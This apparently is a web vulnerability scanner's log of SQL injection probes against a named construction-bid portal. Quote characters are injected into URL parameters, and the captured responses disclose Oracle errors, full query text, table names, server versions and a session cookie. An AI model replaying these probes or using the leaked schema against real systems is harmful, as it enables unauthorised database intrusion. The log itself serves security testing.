Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7570
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=%27&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:45.398 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=%27) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:03:45 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:45 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7570
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=%27&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:45.398 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=%27) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html |
Parameters
| Parameter | Type | Value |
| group | GET | 11 |
| provider | GET | %27 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=%2527 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:02 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:02 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4205
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:04:02.214 [ 1] (TP-Processor1693) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:04:02 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:02 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4205
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:04:02.214 [ 1] (TP-Processor1693) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html |
Parameters
| Parameter | Type | Value |
| group | GET | 11 |
| provider | GET | %27 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=%2527 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:04 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:04 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4179
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:04:04.972 [ 1] (TP-Processor1654) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:04:04 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:04 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4179
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:04:04.972 [ 1] (TP-Processor1654) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at 